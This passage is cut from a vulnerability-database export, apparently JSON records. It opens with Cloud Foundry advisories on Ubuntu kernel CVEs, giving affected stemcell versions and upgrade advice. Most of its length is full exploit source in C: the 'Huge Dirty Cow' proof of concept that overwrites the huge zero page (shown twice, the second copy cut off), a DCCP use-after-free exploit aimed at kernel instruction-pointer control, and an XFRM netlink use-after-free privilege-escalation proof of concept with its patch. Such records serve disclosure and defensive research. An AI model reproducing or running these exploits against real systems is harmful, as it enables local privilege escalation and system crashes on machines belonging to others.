(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
(CVE-2017-16643)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is unspecified unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.49\n * 3363.x versions prior to 3363.45\n * 3421.x versions prior to 3421.35\n * 3445.x versions prior to 3445.21\n * 3468.x versions prior to 3468.16\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3312.x versions to 3312.49\n * Upgrade 3363.x versions to 3363.45\n * Upgrade 3421.x versions to 3421.35\n * Upgrade 3445.x versions to 3445.21\n * Upgrade 3468.x versions to 3468.16\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3509-4](<https://usn.ubuntu.com/3509-4>)\n", "edition": 2, "modified": "2017-12-16T00:00:00", "published": "2017-12-16T00:00:00", "id": "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "href": "https://www.cloudfoundry.org/blog/usn-3509-4/", "title": "USN-3509-4: Linux kernel (Xenial HWE) regression | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. 
A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>))\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. ([CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)) Please note: this CVE is also known colloquially as \u201chuge dirty cow\u201d.\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>))\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. 
([CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.34\n * 3445.x versions prior to 3445.19\n * 3468.x versions prior to 3468.13\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.34\n * Upgrade 3445.x versions prior to 3445.19\n * Upgrade 3468.x versions prior to 3468.13\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3509-2](<http://www.ubuntu.com/usn/usn-3509-2/>)\n * [CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>)\n * [CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)\n * [CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>)\n * [CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>)\n", "edition": 5, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "href": "https://www.cloudfoundry.org/blog/usn-3509-2/", "title": "USN-3509-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "edition": 1, "published": "2017-11-30T00:00:00", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": 
"EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F", "href": "", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\n//\n\n//\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\n// Compile with \"gcc -pthread main.c\"\n//\n// November 2017\n// Bindecy\n//\n\n#define _GNU_SOURCE\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <fcntl.h> \n#include <unistd.h> \n#include <sched.h>\n#include <string.h>\n#include <pthread.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/wait.h> \n\n#define MAP_BASE ((void *)0x4000000)\n#define MAP_SIZE (0x200000)\n#define MEMESET_VAL (0x41)\n#define PAGE_SIZE (0x1000)\n#define TRIES_PER_PAGE (20000000)\n\nstruct thread_args {\n char *thp_map;\n char *thp_chk_map;\n off_t off;\n char *buf_to_write;\n int stop;\n int mem_fd1;\n int mem_fd2;\n};\n\ntypedef void * (*pthread_proc)(void *);\n\nvoid *unmap_and_read_thread(struct thread_args *args) {\n char c;\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\n \n memcpy(&c, args->thp_map + args->off, sizeof(c));\n read(args->mem_fd2, &c, sizeof(c));\n \n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\n usleep(10); // We placed the zero page and marked its PMD as dirty. 
\n // Give get_user_pages() another chance before madvise()-ing again.\n }\n \n return NULL;\n}\n\nvoid *write_thread(struct thread_args *args) {\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\n }\n \n return NULL;\n}\n\nvoid *wait_for_success(struct thread_args *args) {\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\n sched_yield();\n }\n\n args->stop = 1;\n return NULL;\n}\n\nint main() {\n struct thread_args args;\n void *thp_chk_map_addr;\n int ret;\n\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (args.thp_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n return -1;\n }\n if (args.thp_map != MAP_BASE) {\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\n goto err_unmap1;\n }\n \n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\n\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \n if (args.thp_chk_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n goto err_unmap1;\n }\n if (args.thp_chk_map != thp_chk_map_addr) {\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\n goto err_unmap2;\n }\n \n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\n if (ret) {\n perror(\"[!] madvise()\");\n goto err_unmap2;\n }\n\n args.buf_to_write = malloc(PAGE_SIZE);\n if (!args.buf_to_write) {\n perror(\"[!] 
malloc()\");\n goto err_unmap2;\n }\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\n \n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd1 < 0) {\n perror(\"[!] open()\");\n goto err_free;\n }\n \n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd2 < 0) {\n perror(\"[!] open()\");\n goto err_close1;\n }\n\n printf(\"[*] Racing. Gonna take a while...\\n\");\n args.off = 0;\n\n // Overwrite every single page\n while (args.off < MAP_SIZE) { \n pthread_t threads[3]; \n args.stop = 0;\n \n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\n \n if (ret) {\n perror(\"[!] pthread_create()\");\n goto err_close2;\n }\n \n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\n pthread_join(threads[1], NULL);\n pthread_join(threads[2], NULL);\n\n args.off += PAGE_SIZE; \n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\n }\n \n printf(\"[*] Success!\\n\");\n \nerr_close2:\n close(args.mem_fd2);\nerr_close1:\n close(args.mem_fd1);\nerr_free:\n free(args.buf_to_write);\nerr_unmap2:\n munmap(args.thp_chk_map, MAP_SIZE);\nerr_unmap1:\n munmap(args.thp_map, MAP_SIZE);\n \n if (ret) {\n fprintf(stderr, \"[!] 
Exploit failed.\\n\");\n }\n \n return ret;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "edition": 1, "published": "2017-12-07T00:00:00", "title": "Linux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "EXPLOITPACK:21E02FD686B4E07E01D154BAF895DE82", "href": "", "sourceData": "/*\nThis is an announcement for CVE-2017-8824 which is a use-after-free\nvulnerability\n\nI found in Linux DCCP socket. It can be used to gain kernel code execution\nfrom unprivileged processes.\n\n\n\nYou\u2019ll find in attachment the proof of concept code and the kernel panic\nlog.\n\n\n\n####### BUG DETAILS ############\n\n\n\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\ncall is being called with AF_UNSPEC,\n\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\n\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\nobject,\n\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\nsock object, and this leads to both the old and new sock objects can use\nthe same memory.\n\n\n\n####### LINKS ############\n\n\n\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\n\nhttp://lists.openwall.net/netdev/2017/12/04/224\n\n\n\n####### CREDITS ############\n\n\n\nMohamed Ghannam\n*/\n\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\n * */\n#define _GNU_SOURCE\n#include <stdio.h>\n#include 
<string.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <netinet/in.h>\n#include <unistd.h>\n#include <pthread.h>\n#include <sys/mman.h>\n\n\nint fd1,fd2;\nstruct sockaddr_in6 in1,in2;\n\nint do_uaf()\n{\n struct sockaddr_in6 cin1,cin2;\n\n fd1 = socket(0xa,6,0);\n\n memset(&in1,0,sizeof(in1));\n in1.sin6_family = AF_INET6;\n in1.sin6_addr = in6addr_loopback;\n in1.sin6_port = 0x214e;//htons(0x1000);\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\n\n listen(fd1,0x1);\n\n fd2 = socket(0xa,6,0);\n\n memset(&cin1,0,sizeof(cin1));\n cin1.sin6_family = AF_INET6;\n cin1.sin6_addr = in6addr_loopback;\n cin1.sin6_port = 0x214e;//htons(0x1000);\n cin1.sin6_flowinfo = 0;\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\n\n memset(&cin2,0,sizeof(cin2));\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\n memset(&in2,0,sizeof(in2));\n\n in2.sin6_family = AF_INET6;\n in2.sin6_addr = in6addr_loopback;\n in2.sin6_port = htons(0x2000);\n in2.sin6_flowinfo = 0x2;\n in2.sin6_scope_id = 6;\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\n\n struct sockaddr_in6 cin3;\n memset(&cin3,0,sizeof(cin3));\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\n\n listen(fd2,0xb1);\n\n struct sockaddr_in6 cin4;\n memset(&cin4,0,sizeof(cin4));\n cin4.sin6_family = AF_INET6;\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\n cin4.sin6_flowinfo = 1;\n cin4.sin6_scope_id = 0x32f1;\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\n return fd2;\n}\n\nvoid * alloc_umem(void *addr,size_t size)\n{\n\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\n if(addr == (char *)-1) {\n perror(\"mmap\");\n return NULL;\n }\n return addr;\n}\nint main(void)\n{\n char *addr;\n\n addr = (char *)alloc_umem((void*)0x100000000,4096);\n if(addr == NULL)\n exit(0);\n memset(addr,0xcc,4096);\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* 
RIP control */\n\n do_uaf();\n socket(AF_INET,SOCK_STREAM,0);\n close(fd2);\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation", "edition": 1, "published": "2017-11-23T00:00:00", "title": "Linux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16939"], "modified": "2017-11-23T00:00:00", "id": "EXPLOITPACK:F867C230BBE8FA4BCFE72E04CBAC881F", "href": "", "sourceData": "## Vulnerability Summary\nThe following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem \u2013 XFRM.\n\nNetlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.\n\n## Credit\nAn independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\n\n## Vendor response\nThe vulnerability has been addressed as part of 1137b5e (\u201cipsec: Fix aborted xfrm policy dump crash\u201d) patch: CVE-2017-16939\n\n```\n 
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr\n\n static int xfrm_dump_policy_done(struct netlink_callback *cb)\n {\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n struct net *net = sock_net(cb->skb->sk);\n \n xfrm_policy_walk_done(walk, net);\n return 0;\n }\n \n+static int xfrm_dump_policy_start(struct netlink_callback *cb)\n+{\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n+\n+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));\n+\n+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\n+ return 0;\n+}\n+\n static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)\n {\n struct net *net = sock_net(skb->sk);\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n struct xfrm_dump_info info;\n \n- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >\n- sizeof(cb->args) - sizeof(cb->args[0]));\n-\n info.in_skb = cb->skb;\n info.out_skb = skb;\n info.nlmsg_seq = cb->nlh->nlmsg_seq;\n info.nlmsg_flags = NLM_F_MULTI;\n \n- if (!cb->args[0]) {\n- cb->args[0] = 1;\n- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\n- }\n-\n (void) xfrm_policy_walk(net, walk, dump_one_policy, &info);\n \n return skb->len;\n @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {\n \n static const struct xfrm_link {\n int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);\n+ int (*start)(struct netlink_callback *);\n int (*dump)(struct sk_buff *, struct netlink_callback *);\n int (*done)(struct netlink_callback *);\n const struct nla_policy *nla_pol;\n 
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {\n [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },\n [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },\n [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,\n+ .start = xfrm_dump_policy_start,\n .dump = xfrm_dump_policy,\n .done = xfrm_dump_policy_done },\n [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },\n 
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,\n \n {\n struct netlink_dump_control c = {\n+ .start = link->start,\n .dump = link->dump,\n .done = link->done,\n };\n```\n\n## Vulnerability details\nAn unprivileged user can change the sk->sk_rcvbuf value of an XFRM Netlink socket (sk being the struct sock object).\n\nThe value can be set, within a bounded range, via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of the buffer that receives data via recvmsg/recv/read.\n\nThe sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).\n\nskb->truesize is a variable which keeps track of how many bytes of memory are consumed; in order to avoid wasting memory, the kernel can adjust the skb size at run time.\n\nFor example, if we allocate a large socket buffer (skb) and we only received a 1-byte packet, the kernel will adjust this by calling skb_set_owner_r.\n\nBy calling skb_set_owner_r the sk->sk_rmem_alloc (which refers to the atomic variable sk->sk_backlog.rmem_alloc) is modified.\n\n\n\nWhen an XFRM_MSG_GETPOLICY dump request is sent on an XFRM netlink socket, xfrm_dump_policy is called (it is the .dump callback registered for that message type in the xfrm_link table shown in the patch above); when the socket is closed, xfrm_dump_policy_done (the .done callback) is called.\n\nxfrm_dump_policy_done is called whenever cb_running for the netlink_sock object is true.\n\nxfrm_dump_policy_done tries to clean up an xfrm walk entry which is managed by the netlink_callback object.\n\n\n\nWhen netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates sk_rmem_alloc.\n\nnetlink_dump():\n\n\nIn the netlink_dump() snippet (not reproduced in this copy of the advisory) we can see that the netlink_dump() receive-buffer check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we control sk->sk_rcvbuf via setsockopt(SO_RCVBUF), which is exactly what do_setsockopt() in the proof of concept below does).\n\nWhen this check fails, netlink_dump() jumps to the end of the function and returns with an error, and cb_running is not reset to false.\n\nBecause nlk->cb_running is still true, xfrm_dump_policy_done() is called when the socket is closed. The patch above moves xfrm_policy_walk_init() out of the .dump callback into a new .start callback, which indicates that before the fix the walk entry could be torn down by .done without ever having been initialised by .dump. Note also that the proof of concept below first enters new user and network namespaces via unshare() (create_ns()), so when run as an ordinary user it relies on unprivileged user namespaces being enabled on the target.\n\n\n\nnlk->cb.done points to xfrm_dump_policy_done; it is worth noting 
that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.\n\n## Proof of Concept\n\nThe following proof of concept is for Ubuntu 17.04.\n\n```\n#define _GNU_SOURCE\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <asm/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <linux/netlink.h>\n#include <linux/xfrm.h>\n#include <sched.h>\n#include <unistd.h>\n\n#define BUFSIZE 2048\n\n\nint fd;\nstruct sockaddr_nl addr;\n\nstruct msg_policy {\n struct nlmsghdr msg;\n char buf[BUFSIZE];\n};\n\nvoid create_nl_socket(void)\n{\n fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);\n memset(&addr,0,sizeof(struct sockaddr_nl));\n addr.nl_family = AF_NETLINK;\n addr.nl_pid = 0; /* packet goes into the kernel */\n addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */\n\n}\n\nvoid do_setsockopt(void)\n{\n int var =0x100;\n\n setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));\n}\n\nstruct msg_policy *init_policy_dump(int size)\n{\n struct msg_policy *r;\n\n r = malloc(sizeof(struct msg_policy));\n if(r == NULL) {\n perror(\"malloc\");\n exit(-1);\n }\n memset(r,0,sizeof(struct msg_policy));\n\n r->msg.nlmsg_len = 0x10;\n r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;\n r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;\n r->msg.nlmsg_seq = 0x1;\n r->msg.nlmsg_pid = 2;\n return r;\n\n}\nint send_msg(int fd,struct nlmsghdr *msg)\n{\n int err;\n err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));\n if (err < 0) {\n perror(\"sendto\");\n return -1;\n }\n return 0;\n\n}\n\nvoid create_ns(void)\n{\n if(unshare(CLONE_NEWUSER) != 0) {\n perror(\"unshare(CLONE_NEWUSER)\");\n exit(1);\n }\n if(unshare(CLONE_NEWNET) != 0) {\n perror(\"unshared(CLONE_NEWUSER)\");\n exit(2);\n }\n}\nint main(int argc,char **argv)\n{\n struct msg_policy *p;\n create_ns();\n\n 
create_nl_socket();\n p = init_policy_dump(100);\n do_setsockopt();\n send_msg(fd,&p->msg);\n p = init_policy_dump(1000);\n send_msg(fd,&p->msg);\n return 0;\n}\n```", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-12-01T13:01:22", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page. CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-11-30T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EDB-ID:43199", "href": "https://www.exploit-db.com/exploits/43199/", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n\r\n//\r\n// The Huge Dirty Cow POC. 
This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. 
\r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] 
madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += 